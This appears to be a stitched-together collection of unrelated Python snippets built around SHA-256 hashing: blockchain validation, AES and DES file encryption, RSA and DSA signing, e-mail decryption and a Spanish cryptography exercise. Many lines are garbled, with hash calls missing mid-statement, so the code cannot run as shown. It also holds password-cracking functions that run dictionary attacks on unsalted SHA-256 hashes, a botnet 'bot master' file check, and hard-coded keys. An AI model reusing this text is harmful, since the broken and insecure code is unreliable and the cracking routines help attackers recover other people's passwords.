def verify(self, s, signature): """ Check the signature of the string s :param s: String to check :type s: str :param signature: the signature to compare :type signature: str """ if isinstance(s, text_type): s = s.encode('utf8') r = False try: RSAkey = RSA.importKey(self.public) signature = long(signature) if SIGN_WITH_RSA: hashvalue = r = RSAkey.verify(hashvalue, (signature,)) else: hashvalue =, signature) except Exception as _e: # pragma: no cover log.error("Failed to verify signature: {0!r}".format(s)) log.debug("{0!s}".format(traceback.format_exc())) return r
def got_data(self): while True: if len(self.recvbuf) < 4: return if self.recvbuf[:4] != "\xf9\xbe\xb4\xd9": raise ValueError("got garbage %s" % repr(self.recvbuf)) if len(self.recvbuf) < 4 + 12 + 4 + 4: return command = self.recvbuf[4:4+12].split("\x00", 1)[0] msglen = struct.unpack("<i", self.recvbuf[4+12:4+12+4])[0] checksum = self.recvbuf[4+12+4:4+12+4+4] if len(self.recvbuf) < 4 + 12 + 4 + 4 + msglen: return msg = self.recvbuf[4+12+4+4:4+12+4+4+msglen] th = h = if checksum != h[:4]: raise ValueError("got bad checksum %s" % repr(self.recvbuf)) self.recvbuf = self.recvbuf[4+12+4+4+msglen:] if command in self.messagemap: f = cStringIO.StringIO(msg) t = self.messagemap[command]() t.deserialize(f) self.got_message(t) else: print "UNKNOWN COMMAND", command, repr(msg)
def rename_directory(username, old_filename, new_filename): filelog = oldfilename + '.flog' with open(filelog, 'rb') as input: log = pickle.load(input) sig = pickle.load(input) block = log[username] key = RSA.importKey(open(username + '.pri').read()) cipher =, block.decrypt_permission_block(cipher) encrypted_new_filename = encrypt_filename(block.get_file_encryption_key(), new_filename) log['encrypted_name'] = encrypted_new_filename new_filelog = encrypted_new_filename + '.dlog' with open(new_filelog, 'wb') as outfile: pickle.dump(log) length = len(log) with open(new_filelog, 'rb') as infile: pickleload = file_log_hash = file_log_hash.update(picklelog) with open(username + '.dsa', 'rb') as infile: owner_msk = pickle.load(infile) k = random.StrongRandom().randint(1,owner_msk.q-1) sig = owner_msk.sign(file_log_hash.digest(), k) with open(new_filelog, 'a+b') as outfile: pickle.dump(sig, outfile, -1) return encrypted_new_filename
def is_valid(self, difficulty = None): # Calculate the Header Hash self.calc(difficulty) # Get Target target = get_target(self.nBits) # Check check_result, message = check_header_target(self.header, target) if not check_result: return False hashes = [] for tx in self.vtx: tx.sha256 = None if not tx.is_valid(): return False tx.calc_sha256() hashes.append(ser_uint256(tx.sha256)) while len(hashes) > 1: newhashes = [] for i in xrange(0, len(hashes), 2): i2 = min(i+1, len(hashes)-1) newhashes.append([i] + hashes[i2]).digest()).digest()) hashes = newhashes if uint256_from_str(hashes[0]) != self.hashMerkleRoot: return False return True
def chained_sha256(path='data/birthday.mp4', block_size=1024, renew=True, prepend=False): blocks = [] fp = open(path, 'rb') print 'Reading %s bytes from file %s' % (len(, fp.close() with open(path, 'rb') as fp: block = True while block: block = if block: blocks += [block] print 'Read %s blocks of %s bytes each, and one last block of %s bytes for a total of %s bytes.' % ( len(blocks), block_size, len(blocks[-1]), sum(len(block) for block in blocks)) tag = b'' if not renew: sha = for block in reversed(blocks): if renew: sha = if prepend: sha.update(tag + block) else: sha.update(block + tag) tag = sha.digest() return tag.encode('hex')
def share_directory(other_username, dlog): with open(dlog, 'rb') as input: log = pickle.load(input) userList = log['users'] userList.append(other_username) owner_block = log[owner] owner = log['owner'] key = RSA.importKey(open(owner + '.pri').read()) cipher =, owner_block.decrypt_permission_block(cipher) file_aes_key = owner_block.get_file_encryption_key() file_dsa_key = None user_block = AccessBlock(file_aes_key, file_dsa_key) other_key = RSA.importKey(open(other_username + '.pub').read()) other_cipher =, user_block.encrypt_permission_block(other_cipher) log[other_username] = user_block file_log_hash = with open(filelog, 'wb') as infile: pickle.dump(log, infile, -1) length = len(log) with open(filelog, 'rb') as outfile: picklelog = file_log_hash.update(picklelog) with open(owner + '.dsa', 'rb') as infile: owner_msk = pickle.load(infile) k = random.StrongRandom().randint(1,owner_msk.q-1) sig = owner_msk.sign(file_log_hash.digest(), k) with open(filelog, 'a+b') as outfile: pickle.dump(sig, outfile, -1)
def read_encrypted_logs(username, filelogs): names = [] my_key = RSA.importKey(open(username + '.pri').read()) cipher =, for log in filelogs: file_log_hash = with open(log, 'rb') as input: dictlog = pickle.load(input) sig = pickle.load(input) owner = dictlog['owner'] with open(owner + '.dsapub', 'rb') as input: owner_msk = pickle.load(input) length = len(dictlog) with open(log, 'rb') as outfile: picklelog = file_log_hash.update(picklelog) if not owner_msk.verify(file_log_hash.digest(), sig): print('invalid file') if username in dictlog: block = dictlog[username] block.decrypt_permission_block(cipher) name = decrypt_filename(block.get_file_encryption_key(), log[0:-5]) names.append(name) return names
def unsalted_crack_combinitions(start, end): for i in range(start, end): curr_pass = passwords[i].strip("\n") print curr_pass for other in passwords: other = other.strip("\n") appended = curr_pass + other prepended = other + curr_pass a_sha256 = p_sha256 = a_digest = a_sha256.hexdigest() p_digest = p_sha256.hexdigest() #print appended, a_digest #print prepended, p_digest if a_digest in hash_nosalt: r = open('result/'+ a_digest, 'w') result = a_digest + "\t" + appended r.write(result) r.close() print "Found!---> ", result if p_digest in hash_nosalt: r = open('result/'+ p_digest, 'w') result = p_digest + "\t" + prepended r.write(result) r.close() print "Found!---> ", result
def unsalted_crack_digits_ap(start,end): for i in range(start, end): curr_pass = passwords[i].strip("\n") for digit in range(0,10): a = curr_pass + str(digit) p = str(digit) + curr_pass a_sha256 = p_sha256 = a_digest = a_sha256.hexdigest() p_digest = p_sha256.hexdigest() if a_digest in hash_nosalt: r = open('result_crack_digits_ap/'+ a_digest, 'w') result = a_digest + "\t" + a + "\n" r.write(result) r.close() print "Found!---> ", result if p_digest in hash_nosalt: r = open('result_crack_digits_ap/'+ p_digest, 'w') result = p_digest + "\t" + p + "\n" r.write(result) r.close() print "Found!---> ", result
def solve_proof_of_work(self): """ solves the proof of work problem Starting with the random nonce, this thread will increment this value and hash the block with the nonce and test to see if the hash ends with the 'target' amount of zeros. If not, the nonce is incremented and a new hash is produced """'Mining started...') self.client.broadcast_info('Mining started') self.isMining = True hash = #self.b.computeMerkleRoot() for t in self.transactions: self.b.add_transaction(t) # create an array of target-length bytes target = bytes( hash.update(self.b.pack()) digest = hash.digest() while not self.test_hash(digest, hash = # update the nonce self.b.nonce += 1 hash.update(self.b.pack()) digest = hash.digest() if self.start_over: self.start_over = False return False return True
def is_valid(self): #self.calc_sha256() self.calc_scrypt() target = uint256_from_compact(self.nBits) #if self.sha256 > target: if self.scrypt > target: return False hashes = [] for tx in self.vtx: tx.sha256 = None if not tx.is_valid(): return False tx.calc_sha256() hashes.append(ser_uint256(tx.sha256)) while len(hashes) > 1: newhashes = [] for i in xrange(0, len(hashes), 2): i2 = min(i+1, len(hashes)-1) newhashes.append([i] + hashes[i2]).digest()).digest()) hashes = newhashes if uint256_from_str(hashes[0]) != self.hashMerkleRoot: return False return True
def send_message(self, message): if self.state == "closed": return if self.verbose: print "send %s" % repr(message) if hasattr(message, 'serialize'): # msg_ object command = message.command data = message.serialize() else: # JSON string or dictionary with JSON-encoded values in it: if not isinstance(message, dict): # JSON { "message" : [ fields ] } message = json.loads(message) command = message.keys()[0] obj = self.messagemap[command]() obj.from_array(message[command], self.replace_magic_constants) data = obj.serialize() tmsg = self.message_header tmsg += bytes(command) tmsg += b"\x00" * (12 - len(command)) tmsg += struct.pack("<I", len(data)) if self.ver_recv >= 209: th = h = tmsg += h[:4] tmsg += data self.sendbuf += tmsg
def decrypt_email(self, enc_email): salt = enc_email['From'][:32] enc_email.replace_header('From', enc_email['From'][33:]) plain_email = MIMEMultipart() for header in self.TOKENIZE_HEADER_PART: IV = header).digest()[:16] if header == 'Subject': plain_email[header] = self.decrypt(IV, enc_email[header][ 66:enc_email[header].find('.', 99)+1]) else: if enc_email[header] != None: plain_email[header] = self.decrypt(IV, enc_email[header]) for part in enc_email.walk(): if (part.get_content_maintype() == 'multipart') and ( part.get_content_subtype() != 'plain'): continue body = part.get_payload() if body == None or body == '': return plain_email IV = + 'Body').digest()[:16] plain_body = self.decrypt(IV, body[98:body.find('.', 131)+1]) plain_email.attach(MIMEText(plain_body)) return plain_email
def hash_160_to_bc_address(h160): if not have_crypto: return '' vh160 = "\x00"+h160 # \x00 is version 0 addr=vh160+h3[0:4] return b58encode(addr)
def post(self): otp = Otp() otp.learning_association = ndb.Key(urlsafe=self.request.POST.get('sf')) otp_token = + ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(30))).hexdigest() otp.token = learning_association = otp.learning_association.get() if learning_association: otp.put() mail.send_mail(sender="Voksenopplæringsforbundet <*****@*****.**>", to="%s <%s>" % (,, subject="Engangspassord til reisestipendsøknader", body=""" Hei For å logge inn til reisestipendsøknadene, bruk denne lenken: %sotp/%s Lenken er gyldig i en time. Hilsen Voksenopplæringsforbundet """ % (myapp.APPLICATION_URL, otp_token)) template_values = { 'application_year': myapp.APPLICATION_YEAR, 'learning_association': learning_association } template = JINJA_ENVIRONMENT.get_template('login_sent.html') self.response.write(template.render(template_values)) else: self.abort(400)
def computeTag(fileName): #hash = blocks = [] file = open(fileName, "rb") with file: while True: chunk = if chunk: blocks.append(chunk) else: break print len(blocks) numBlocks = len(blocks) i = numBlocks-1 while i>0: hash = hash.update(blocks[i]) blocks[i-1] = blocks[i-1] + hash.digest() i = i-1 #print blocks[numBlocks-1].encode('hex') #print blocks[0].encode('hex') hash = hash.update(blocks[0]) tag = hash.hexdigest() print tag
def main(): parser = OptionParser() parser.add_option("--testnet", help="generate testnet addresses", dest="testnet", action="store_true", default=False) parser.add_option("--wif", help="specify a WIF address on the command line instead of generating it", dest="wif", action="store_true", default=False) (options, args) = parser.parse_args() if options.testnet: pywallet.addrtype = 111 if options.wif: sec_mini = None sec_raw = pywallet.DecodeBase58Check(args[0])[1:] elif args: sec_mini = args[0] if not valid_mini(sec_mini): print >>sys.stderr, "not a valid mini key" sys.exit(1) sec_raw = else: sec_mini = generate_mini_private_key() sec_raw = sec_hex = sec_raw.encode('hex').upper() sec_wallet = pywallet.EncodeBase58Check("\x80" + sec_raw) # wallet import format pkey = pywallet.regenerate_key(pywallet.SecretToASecret(sec_raw)) assert sec_raw == pywallet.GetSecret(pkey) priv_key = pywallet.GetPrivKey(pkey) pub_key = pywallet.GetPubKey(pkey) pub_addr = pywallet.public_key_to_bc_address(pub_key) print "Address: %s" % (pub_addr,) print "Privkey: %s" % (sec_wallet,) print "Privkey (hex): %s" % (sec_hex,) print "Privkey (mini): %s" % (sec_mini,)
def hash(self, first, second): """ Snapchats hashing function :param first: :param second: :return: """ first = self.SECRET + first second = second + self.SECRET hash = hash.update(first) hash1 = hash.hexdigest() hash = hash.update(second) hash2 = hash.hexdigest() result = '' for i in range(len(self.HASH_PATTERN)): if int(self.HASH_PATTERN[i]): result += hash2[i] else: result += hash1[i] return result
def _recomputeDigest(self): """ Digest the fields and set self._digest to the hex digest. """ sha256 = number = bytearray(4) # Debug: sync-state.proto defines seq and session as uint64, but # the original ChronoChat-js only digests 32 bits. self._int32ToLittleEndian(self._sessionNo, number) sha256.update(number) self._int32ToLittleEndian(self._sequenceNo, number) sha256.update(number) sequenceDigest = sha256.digest() sha256 = # Use Blob to convert a string to UTF-8 if needed. sha256.update(Blob(self._dataPrefix).toBuffer()); nameDigest = sha256.digest() sha256 = sha256.update(nameDigest) sha256.update(sequenceDigest) nodeDigest = sha256.digest() # Use Blob to convert a str (Python 2) or bytes (Python 3) to hex. self._digest = Blob(nodeDigest).toHex()
def makeKey(self, password, salt): salt_hash = salt_hash.update(salt) pass_hash = pass_hash.update(salt_hash.hexdigest().encode('utf8')) pass_hash.update(password.encode('utf8')) return pass_hash.digest()
def main(): file_name = 'v1.mp4' block_size = 1024 statinfo = os.stat(file_name) file_size = statinfo.st_size print 'File name: ' + file_name print 'File size: ' + repr(file_size) last_block_size = file_size % block_size with open(file_name, 'rb') as f: block = bytearray() hash_block = bytearray() if last_block_size != 0: pos = (-1)*last_block_size, 2) # offset relative to the end block = # read to the end h = hash_block = h.digest() last_block_size = 0 print 'last block hash: ' + h.hexdigest() + ' pos: ' + repr(f.tell()) for i in range(file_size/block_size,0,-1): pos = pos - block_size, 2) block = block = block + hash_block h = hash_block = h.digest() print 'block ' + repr(i) + ' hash: ' + h.hexdigest() + ' pos: ' + repr(f.tell()) print 'Hash: ' + repr(h.hexdigest())
def decrypt_model(self, in_model, uniqid): if not isinstance(in_model, Secret): raise RuntimeException('in_model is not an instance of Secret') #generate the input for our key derivation formula hasher = hasher.update('{}{}'.format(uniqid, in_model.Nonce)) keyhash = hasher.digest() #derive our AES key (aes256 wants 32bytes) aeskey = PBKDF2( password=keyhash, salt=in_model.Salt, dkLen=32, count=10000, ) #derive our Iv from the UniqID (16 bytes) hasher = hasher.update('{}{}'.format(uniqid, aeskey)) aesiv = hasher.digest()[:16] #unpad from ## s[:-ord(s[len(s)-1:])] BS = 16 unpad = lambda s : s[0:-ord(s[-1])] #encrypt it w/ padding cipher =, AES.MODE_CBC, aesiv) return unpad(cipher.decrypt(in_model.CipherText))
def decrypt(in_file, out_file, password, key_length=32, read_blocks=1024): """ Decrypt data stream using password as the seed to decryption key. Calculate checksums for both the ciphertext data and the plaintext data during the decryption. """ ciphertext_checksum = plaintext_checksum = block_size = AES.block_size salt = ciphertext_checksum.update(salt) key, iv = derive_key_and_iv(str(password), salt, key_length, block_size) cipher =, AES.MODE_CBC, iv) next_chunk = "" finished = False while not finished: encrypted_chunk = * block_size) ciphertext_checksum.update(encrypted_chunk) chunk, next_chunk = next_chunk, cipher.decrypt(encrypted_chunk) if len(next_chunk) == 0: padding_length = ord(chunk[-1]) chunk = chunk[:-padding_length] finished = True out_file.write(chunk) plaintext_checksum.update(chunk) return ciphertext_checksum.hexdigest(), plaintext_checksum.hexdigest()
def hash_160_to_bc_address(h160, version="\x00"): if not have_crypto: return "" vh160 = version + h160 h3 = addr = vh160 + h3[0:4] return b58encode(addr)
def encrypt(in_file, out_file, password, key_length=32, read_blocks=1024): """ Encrypt data stream using password as the seed to encryption key. Calculate checksums for both the plaintext data and the ciphertext data during the encryption. """ plaintext_checksum = ciphertext_checksum = block_size = AES.block_size salt = key, iv = derive_key_and_iv(str(password), salt, key_length, block_size) cipher =, AES.MODE_CBC, iv) out_file.write(salt) ciphertext_checksum.update(salt) finished = False while not finished: chunk = * block_size) plaintext_checksum.update(chunk) if len(chunk) == 0 or len(chunk) % block_size != 0: padding_length = ((block_size - len(chunk) % block_size) or block_size) chunk += padding_length * chr(padding_length) finished = True encrypted_chunk = cipher.encrypt(chunk) out_file.write(encrypted_chunk) ciphertext_checksum.update(encrypted_chunk) return plaintext_checksum.hexdigest(), ciphertext_checksum.hexdigest()
def shasha(*args): h= for x in args: h.update(x) h2= h2.update(h.digest()) return h2.digest()
def post(self): if self.get_secure_cookie('email'): email=self.get_secure_cookie('email') users_coll=self.application.db.users user = yield users_coll.find_one({'email':email}) if user: hide = self.get_argument('hide') oldpass = self.get_argument('oldpas') newpass = self.get_argument ('newpas') if not oldpass=="1": if hide == email and user["password"] == and not newpass=="1": user["email"] = self.get_argument('email') user["name"] = self.get_argument('name') user["password"] = yield self.redirect("/profile") else: self.redirect("/") else: user["email"] = self.get_argument('email') user["name"] = self.get_argument('name') yield self.redirect("/profile") else: self.redirect("/")
def decrypt(self, buff): md =[:-0x100]) verifier = if verifier.verify(md, buff[-0x100:]) == False: raise ValueError('Invalid signature in footer.') if self._pubkey is not None: md =[:-0x200]) verifier = if verifier.verify(md, buff[-0x200:-0x100]) == False: raise ValueError('Invalid signature in footer.') buff = buff[:-0x200] nonce = array.array('I', buff[-4:]) nonce.byteswap() length = len(buff) - 4 buff = array.array('I', buff[:-4] + b'\x00' * (8 - length % 8)) buff.byteswap() counter =, prefix=nonce.tostring(), initial_value=0, little_endian=True) cipher =, Blowfish.MODE_CTR, counter=counter) buff = array.array('I', cipher.decrypt(buff.tostring())) buff.byteswap() buff = buff.tostring()[:length] md = buff[-20:] buff = buff[:-20] if md != hashlib.sha1(buff).digest(): raise ValueError('Invalid SHA1 hash in footer.') return buff
def verify_file(f, signature): # Verify the file was sent by the bot master # TODO: For Part 2, you'll use public key crypto here # Naive verification by ensuring the first line has the "passkey" # Split message up by line breaks into an array split_f = f.split(b"\n") # Check for a private key if len(split_f) < 27: return False # Decrypt the message using the private key message, dsize = decrypt_message(split_f) # Verify encryption digest =[:-dsize]).digest() if digest == message[-dsize:]: # Remove digest from message message = message[:-dsize] # Hash message for verification hashed_m = # Verify signature using the public key pukey = RSA.importKey(open(os.path.join("", "publickey"), "rb").read()) verifier = return verifier.verify(hashed_m, signature)
def buildTransactionInput(inputParameters, rawTransaction, hashtype): # Sequence is set to UNIT_MAX = "FFFFFFFF" because this will permanently lock this transaction # - Sequence is intended to work with Replacements, but Replacement is currently disabled inputSequence = "ffffffff" (previousTransactionHash, previousTransactionOutputIndex, previousTransactionOutputPublicAddress, privateKey ) = inputParameters reversePreviousTransactionHash = previousTransactionHash.decode("hex")[::-1].encode("hex") previousTransactionOutputIndexHex = struct.pack('<L', previousTransactionOutputIndex).encode('hex') singleSHA256_RawTransaction ="hex")).hexdigest() doubleSHA256_RawTransaction ="hex")).digest() scriptSig = buildScriptSig(privateKey, doubleSHA256_RawTransaction, hashtype) scriptSigLength = "%02x" % len(scriptSig.decode("hex")) transactionInput = (reversePreviousTransactionHash + previousTransactionOutputIndexHex + scriptSigLength + scriptSig + inputSequence) # print transactionInput return transactionInput
def double_sha256(s): return
def sign_message(self, text, key): privKey = DSA.import_key(bytes(key, 'utf-8')) hash_obj =, 'utf-8')) signer =, 'fips-186-3') signature = signer.sign(hash_obj) return base64.b64encode(signature)
def hash_password(b): hash =, encoding='utf-8'))) return hash.digest()
def get_key(password): key = return key
# Se pide descifrar el texto cifrado utilizando el modo de operacion ECB, y mostrar el texto en # claro por pantalla utilizando print() si el hash de ese texto en claro y la variable "hash" coinciden. # La primitiva de criptografia simetrica utilizada en este ejercicio debera ser deducida por el # alumno en base a la informacion proporcionada. # Ejercicio # ---------- BLOCK_SIZE = 16 key = b'0123456789ABCDEF' # Que mecanismo criptografico usa 128 bits como clave secreta... ciphertext = b"'\xa8\x08\x89(\xe2\x81\x9c9\x98\xeb\xb0n\x16<\x04\x93:\xdaBX\xb8dP\x99\x9a?s\x85u&\xa6\xaf\xecx\xfeoo\xc2\xa4\xc4\xc2I\t&\xb0t\xafn&\x04\x9e\xfb'\xbd\x9e\xaaw\x0f\xe3Jq\xc5\xae@\x82p\x82:86\xf5k\xc3\xae\xda\x01UD!" hash = b'*\x9f\xa7\xffv\xc3\xf1\xcc\xe2\xc3R\xd1M\nT\x9bS\x94\x87j\xab\xbeI\xd43\xdb\xde\x01\x9c}\xd0\xd9' # A resolver por el alumno decipher_aes =, AES.MODE_ECB) desc = (unpad(decipher_aes.decrypt(ciphertext), BLOCK_SIZE)) h = h.update(desc) if h.digest() == hash: print(desc.decode("utf-8", "ignore")) else: print("Mensaje no bueno") #################################################### #################################################### print("#========================") print("# PREGUNTA 2 (2,5 puntos)") print("#========================") # Enunciado # ---------- # Se proporcionan las variables "private" (clave privada RSA), "public" (clave publica RSA, # correspondiente a la clave privada contenida en la variable "private"), "cipherRSA" (cifrado
def getkey(key): key ='utf-8')) return key.digest()
def pubkey_to_hash(pubkey): return
def calculate_signature(sender_private_key,data): digest = or hash same thing signature = sender_private_key.sign(digest,'') return signature
def query(self):'query') # 1. Create nounce. nounce = str(random.randint(0, 1000000000)) # 2. Encode nounce and source source_id = self._hparams.identity nounce_bytes = bytes(nounce, 'utf-8') source_bytes = bytes(source_id, 'utf-8') spikes = numpy.array(['this is a test']) payload_bytes = pickle.dumps(spikes, protocol=0) # 3. Create unique message hash. hash = hash.update(nounce_bytes) hash.update(source_bytes) hash.update(payload_bytes) message_id = hash.digest() # 4. Create futures. spike_futures = [] for i,channel in enumerate(self._channels): try: stub = bittensor.proto.bittensor_pb2_grpc.BittensorStub(channel) request = bittensor.proto.bittensor_pb2.SpikeRequest( version=1.0, source_id=self._hparams.identity, parent_id=self._hparams.identity, message_id=message_id, payload=payload_bytes) spike_futures.append(stub.Spike.future(request)) except Exception as e: logger.error(str(e)) # 5. Catch future responses start = time.time() exception = [False for _ in spike_futures] result = [False for _ in spike_futures] returned = [False for _ in spike_futures] timed = [0 for _ in spike_futures] while True: for i, future in enumerate(spike_futures): if future.done(): returned[i] = True timed[i] = time.time() - start try: if future.exception(): exception[i] = True failing_channels[i] = True except Exception as e: pass try: future.result() result[i] = True except Exception as e: pass if time.time() - start > 3: break if sum(returned) == len(spike_futures): break for i in range(len(returned)): if returned[i]: r1 = self._channel_reliability[i] self._channel_reliability[i] = (r1 * 0.95) + (0.05 * 1) else: r1 = self._channel_reliability[i] self._channel_reliability[i] = (r1 * 0.95) + (0.05 * 0) # 6. Create grad futures. grad_futures = [] for channel in self._channels: try: zeros_payload = pickle.dumps(numpy.zeros((1, self._hparams.n_embedding)), protocol=0) stub = bittensor.proto.bittensor_pb2_grpc.BittensorStub(channel) request = bittensor.proto.bittensor_pb2.GradeRequest( version=1.0, source_id=self._hparams.identity, parent_id=self._hparams.identity, message_id=message_id, payload=zeros_payload) grad_futures.append(stub.Grade.future(request)) except Exception as e: logger.error(str(e)) # 7. Catch grad future responses start = time.time() exception = [False for _ in grad_futures] result = [False for _ in grad_futures] returned = [False for _ in grad_futures] timed = [0 for _ in grad_futures] while True: for i, future in enumerate(grad_futures): if future.done(): returned[i] = True timed[i] = time.time() - start try: if future.exception(): exception[i] = True except Exception as e: pass try: future.result() result[i] = True except Exception as e: pass if time.time() - start > 3: break if sum(returned) == len(grad_futures): break'C: {}', list(zip(result, timed, self._channel_reliability)))
def match_signature(sender_public_key,data,signature): digest = return sender_public_key.verify(digest,signature)
def _Base64Sign(self, plaintext): """Signs and returns a base64-encoded SHA256 digest.""" shahash = signer = signature_bytes = signer.sign(shahash) return base64.b64encode(signature_bytes)
def transact(): sender = raw_input('Enter Sender: ').lower() if sender not in users: print "User:"******"don't exist!" ch = raw_input('Add user(Y/N)?') if ch.lower() == 'y': add_user() return receiver = raw_input('Enter Receiver:').lower() if receiver not in users: print "User:"******"don't exist!" ch = raw_input('Add user(Y/N)?') if ch.lower() == 'y': add_user() return amt = int(raw_input('Enter amount: ')) #### precheck balance then only go forward #### if users[sender][1] == 0: print sender,"have 0 balance !" return ######## work on cryptography ############################ t = chain.head while t != None: #comparing pulbic keys of the two nodes if t.receiver == users[sender][0][1] and t.spentflag == 0 and amt <= t.amount: current_amt = t.amount t.spentflag = 1 parent_block_id = ###### local reference ###### users[sender][1] = users[sender][1]-amt users[receiver][1] = users[receiver][1]+amt ############################# break else: t = if t == None: print sender,' is trying to spend more than what they have !' return ############################# #### we can add block before verifying the transaction by meeting certain conditions or during the time of adding block... transaction1 =' paid '+str(amt)+' coins to '+receiver).hexdigest() transaction2 =' paid '+str(current_amt-amt)+' coins to '+sender).hexdigest() id1 = chain.blockid() id2 = chain.blockid() data_for_signature1 = str(id1)+str(users[sender][0][1])+transaction1+str(amt) data_for_signature2 = str(id2)+str(users[sender][0][1])+transaction2+str(current_amt-amt) sign1 = calculate_signature(users[sender][0][0],data_for_signature1) sign2 = calculate_signature(users[sender][0][0],data_for_signature2) chain.addblock(id1,users[sender][0][1],users[receiver][0][1],amt,transaction1,0,parent_block_id,sign1) chain.getlatestblock().prev = chain.getblock_by_id(parent_block_id) chain.addblock(id2,users[sender][0][1],users[sender][0][1],current_amt-amt,transaction2,0,parent_block_id,sign2) chain.getlatestblock().prev = chain.getblock_by_id(parent_block_id)
if args.appcore_image is True: boot_block_id = 1 else: boot_block_id = 0 boot_block = boot_block_struct.pack(boot_block_marker, boot_block_id, image_addr, image_size + boot_block_struct.size + len(certificate), stated_size, certificate_offset, 0, args.version) if (is_signature == True): # Sign the complete image message = header + input_file[header_struct.size:] + boot_block + certificate hash = out_file_path = os.path.join(os.path.dirname(__file__), 'dump_python.bin') file_out=open(out_file_path, 'wb') file_out.write(message) signer = signature = signer.sign(hash) print "Signature processing..." with open('data.bin', 'ab') as out_file: out_file.write(boot_block+certificate+signature) update_section = subprocess.check_output(['arm-none-eabi-objcopy',
def encrypto_file(target_file): print('암호화를 시작합니다.') print('암호화 알고리즘을 선택하세요.') print('[1] DES') print('[2] AES') print('[DEFAULT] AES') user_input = input('입력: ') try: user_input = int(user_input) except: print('기본값을 사용합니다.') user_input = 2 if user_input == 1: algorithm = 'DES' elif user_input == 2: algorithm = 'AES' else: print('[FATAL] 알 수 없는 오류 발생') sys.exit(1) print('') print('블록암호 운용방식을 선택하세요.') print('[1] CTR') print('[2] CBC') print('[DEFAULT] CBC') user_input = input('입력: ') try: user_input = int(user_input) except: print('기본값을 사용합니다.') user_input = 2 if user_input == 1: mode = 'CTR' elif user_input == 2: mode = 'CBC' else: print('[FATAL] 알 수 없는 오류 발생') sys.exit(1) print('') print('암호화 키를 입력하세요.') while True: user_input = getpass.getpass('패스워드 입력: ') try: password = user_input.encode('ascii') hasing = hasing.update(password) password = hasing.digest() break except UnicodeEncodeError: print('아스키코드 변환중 오류가 발생했습니다.') print('아스키코드에 있는 문자로 입력해주세요.') print('') if algorithm == 'DES': if mode == 'CTR': enc_des_ctr(target_file, password[:8]) elif mode == 'CBC': enc_des_cbc(target_file, password[:8]) else: print('[FATAL] 알 수 없는 오류 발생!') sys.exit(1) elif algorithm == 'AES': if mode == 'CTR': enc_aes_ctr(target_file, password) elif mode == 'CBC': enc_aes_cbc(target_file, password) else: print('[FATAL] 알 수 없는 오류 발생!') sys.exit(1) print('암호화 완료!')
# David Chaum 1983 提出加密技术运用于现金 from Crypto.Signature import pss from Crypto.Hash import SHA256 from Crypto.PublicKey import RSA from Crypto import Random # sender can create the signatue of a message using their private key message = b"To be signed" key = RSA.importKey( open("../01blockchain explained by picture/i4PyCryptodome/d3private.pem"). read()) h = signature = print(signature, type(signature)) print("-" * 20) key = RSA.importKey( open("../01blockchain explained by picture/i4PyCryptodome/d3public.pem"). read()) h = verifier = try: verifier.verify(h, signature) print("The signature is authentic.") except (ValueError, TypeError): print("The signature is not authentic.")
#encoding=utf8 import os import json from Crypto.Cipher import AES from Crypto.Hash import SHA256 import datetime token = '316da1df9dfea24e8285a5574d3d9e64'.replace( '3', 't') #'125B999464194769AC72CCC42E4DB8FA' sha256 = sha256.update(token) array = sha256.digest() #print repr(array), len(array) key = array vec = array[16:] crypt =, AES.MODE_CBC, vec) data = open('DAYNOW.htm', 'r').read().decode('base64') datajson = crypt.decrypt(data) #34640 txt = datajson.decode('utf-8') # f2 = open('out.txt','w') # f2.write(json.loads(datajson)) # f2.close() try: d = json.loads(txt) except: txt = txt.replace(txt[len(txt) - 1], '') d = json.loads(txt) print d['month'], d['day'] os.system('pause >nul')
def hash_mp(mp): h = h.update(mp) return h.hexdigest()[:32]
def hash_password(password): salt = 'cpsc476' db_password = password + salt h = return h
def getHash(bytes): hash_object = hash_object.update(base64.b64encode(bytes)) return hash_object.digest()
'''hashlib''' import hashlib per_st = time.perf_counter() m = hashlib.sha256(test_str).digest() per_ed = time.perf_counter() print(binascii.hexlify(m)) print('run time use hashlib: ' + str(per_ed - per_st) + ' s') '''pycryptodome''' from Crypto.Hash import SHA256 per_st = time.perf_counter() h = per_ed = time.perf_counter() print(binascii.hexlify(h)) print('run time use pycryptodome: ' + str(per_ed - per_st) + ' s') '''cryptography''' from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import hashes per_st = time.perf_counter() digest = hashes.Hash(hashes.SHA256(), backend=default_backend()) digest.update(test_str) s = digest.finalize() per_ed = time.perf_counter()
def EMSA_PKCS1_V1_5_ENCODE(M, emLen): digestInfo = b'\x30\x31\x30\x0d\x06\x09\x60\x86\x48\x01\x65\x03\x04\x02\x01\x05\x00\x04\x20' + M).digest() #print("%x"%int.from_bytes(digestInfo,byteorder='big')) # We need at least 11 bytes for the remaining data: 3 fixed bytes and # at least 8 bytes of padding). if emLen < len(digestInfo) + 11: raise TypeError( "Selected hash algorith has a too long digest (%d bytes)." % len(digest)) PS = b'\xFF' * (emLen - len(digestInfo) - 3) out = b'\x00\x01' + PS + b'\x00' + digestInfo #print("%x"%int.from_bytes(out,byteorder='big')) return out
def sign(self, *msg): h = for m in msg: h.update(m) return self.s.sign(h)
def key_fingerprint(key_str): return
def detailed_testvector(): #test vector from NIST ( n = 0xc8a2069182394a2ab7c3f4190c15589c56a2d4bc42dca675b34cc950e24663048441e8aa593b2bc59e198b8c257e882120c62336e5cc745012c7ffb063eebe53f3c6504cba6cfe51baa3b6d1074b2f398171f4b1982f4d65caf882ea4d56f32ab57d0c44e6ad4e9cf57a4339eb6962406e350c1b15397183fbf1f0353c9fc991 e = 0x0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010001 d = 0x5dfcb111072d29565ba1db3ec48f57645d9d8804ed598a4d470268a89067a2c921dff24ba2e37a3ce834555000dc868ee6588b7493303528b1b3a94f0b71730cf1e86fca5aeedc3afa16f65c0189d810ddcd81049ebbd0391868c50edec958b3a2aaeff6a575897e2f20a3ab5455c1bfa55010ac51a7799b1ff8483644a3d425 message = 0xe567a39ae4e5ef9b6801ea0561b72a5d4b5f385f0532fc9fe10a7570f869ae05c0bdedd6e0e22d4542e9ce826a188cac0731ae39c8f87f9771ef02132e64e2fb27ada8ff54b330dd93ad5e3ef82e0dda646248e35994bda10cf46e5abc98aa7443c03cddeb5ee2ab82d60100b1029631897970275f119d05daa2220a4a0defba expected = 